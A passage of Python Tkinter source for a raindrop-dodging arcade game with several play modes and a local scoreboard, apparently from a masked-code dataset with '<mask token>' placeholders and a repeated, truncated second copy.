splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\n<mask token>\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\n<mask token>\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\n<mask token>\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\n<mask token>\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\n<mask token>\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\n<mask token>\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x 